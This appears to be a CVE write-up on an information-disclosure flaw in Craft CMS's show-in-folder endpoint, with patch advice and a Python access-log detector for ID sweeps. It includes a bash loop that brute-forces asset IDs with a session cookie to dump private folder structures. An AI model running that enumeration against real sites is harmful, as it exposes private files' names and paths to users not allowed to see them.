The vulnerability resides in the `actionShowInFolder` method within src/controllers/AssetsController.php. This method is designed to return an asset's filename and its complete folder hierarchy when supplied with an asset ID. However, it fails to verify that the authenticated user possesses the necessary `viewAssets` or `viewPeerAssets` permissions for the volume containing the target asset. Consequently, any authenticated user with only the `accessCp` permission can call this endpoint.
The method execution proceeds as follows:
1. `requireCpRequest()` confirms the request is for the control panel but does not enforce any volume-level permission checks.
2. `Asset::findOne($assetId)` retrieves the asset directly from the database without applying an `editable` or `savable` scope filter, making assets from all volumes reachable.
3. The method then returns a JSON response containing the asset’s filename and the complete folder structure. This includes the volume handle, volume UID, and for each parent folder: its name, UID, and URI path.
4. An attacker can brute-force asset IDs, as they are sequential integers, to systematically enumerate the names and paths of private assets across the entire system.
This vulnerability is a direct example of an incomplete patch. It mirrors four other security advisories (GHSA-x76w-8c62-48mg, GHSA-vgjg-248p-rfm2, GHSA-5pgf-h923-m958, GHSA-3pvf-vxrv-hh9c) patched on 2026-02-25, which added `requireVolumePermissionByAsset()` and `requirePeerVolumePermissionByAsset()` checks to sibling `AssetsController` actions. `actionShowInFolder` was introduced after that patch wave and never received the same checks, so the critical permission check was omitted.
dailycve form:
Platform: Craft CMS
Version: before 4.17.8
Vulnerability: Info Disclosure
Severity: low
Date: 2026-05-06
Prediction: Patch: 2026-02-25
Analytics under What Undercode Say:
Exploit script to brute-force asset IDs and dump folder structures:

```bash
BASE_URL="https://example.com/admin/actions/assets/show-in-folder"
AUTH_COOKIE="your_craft_session_cookie_value_here"

for id in $(seq 1 1000); do
  curl -s -X POST -b "CraftSessionId=$AUTH_COOKIE" \
    -d "assetId=$id" \
    "$BASE_URL" | jq '.'
done
```

Manual request example:

```bash
curl -X POST -H "Content-Type: application/json" \
  -b "CraftSessionId=$AUTH_COOKIE" \
  -d '{"assetId": 42}' \
  "$BASE_URL"
```
Exploit:
An authenticated user can directly call the controller endpoint with a target assetId. This step can be automated to iterate through sequential asset IDs. For each asset, the server returns a JSON object exposing the filename and a complete path hierarchy. This includes volume names, volume UIDs, folder names, folder UIDs, and folder URI paths, all without any permission validation.
Protection from this CVE:
- Immediately update Craft CMS to version 4.17.8 or later for the 4.x branch, or to version 5.9.14 or later for the 5.x branch.
- As a workaround, apply a custom user-group permission via a plugin to restrict access to the `assets/show-in-folder` endpoint.
- Implement a global middleware that validates asset permissions before any asset-related controller actions are executed.
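Until an instance is patched, the ID sweep described above leaves a footprint in the web server access log: one client posting to the `assets/show-in-folder` action far more often than a person browsing folders would. The following detector is an added example, not code from the advisory or from Craft CMS; it assumes combined log format and the default `/admin` control panel path, and the sample log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Fields we need from Apache/nginx combined log format: client IP, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Path of the affected controller action; the "/admin" prefix is the default control panel trigger (assumed).
SHOW_IN_FOLDER = "/admin/actions/assets/show-in-folder"

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, TS_FMT), method, path.split("?")[0], int(status)

def find_enumeration(lines, threshold=20, window=timedelta(seconds=60)):
    """Flag clients that POST to show-in-folder at least `threshold` times within `window`.
    The assetId travels in the POST body, so the log cannot show which IDs were tried; the
    signal is volume. Every status counts, because a sequential sweep also hits element IDs
    that are not assets and gets errors for them. Lines are assumed to be in chronological
    order. Returns {ip: (peak_count, first_timestamp, last_timestamp)} for flagged clients.
    """
    recent = defaultdict(deque)  # ip -> timestamps of matching requests inside the window
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, _status = parsed
        if method != "POST" or path != SHOW_IN_FOLDER:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and len(q) > alerts.get(ip, (0,))[0]:
            alerts[ip] = (len(q), q[0], q[-1])
    return alerts

# Constructed sample log (not from a real server): one user opens two folders minutes
# apart, while another client fires 25 requests in 25 seconds, as an ID sweep would.
def _line(ip, t, status):
    return f'{ip} - - [{t.strftime(TS_FMT)}] "POST {SHOW_IN_FOLDER} HTTP/1.1" {status} 287'

_T0 = datetime.strptime("06/May/2026:10:00:00 +0000", TS_FMT)
SAMPLE_LOG = [_line("10.0.0.9", _T0, 200), _line("10.0.0.9", _T0 + timedelta(minutes=5), 200)]
SAMPLE_LOG += [_line("10.0.0.5", _T0 + timedelta(seconds=i), 200 if i % 3 else 400) for i in range(25)]
```

Tune `threshold` and `window` to the instance's normal control panel traffic; on a patched instance the action is still reachable, so the same alert remains useful as a general misuse signal.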
Impact:
- Any authenticated control panel user can discover filenames and the complete folder structure of private assets in volumes they should not access.
- This exposure of sensitive volume structures—such as private document repositories or confidential media—provides an attacker with valuable reconnaissance data.
- The disclosed paths and filenames can be used to launch further targeted attacks, including attempts to directly access or exfiltrate the actual file content via other potential vulnerabilities.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode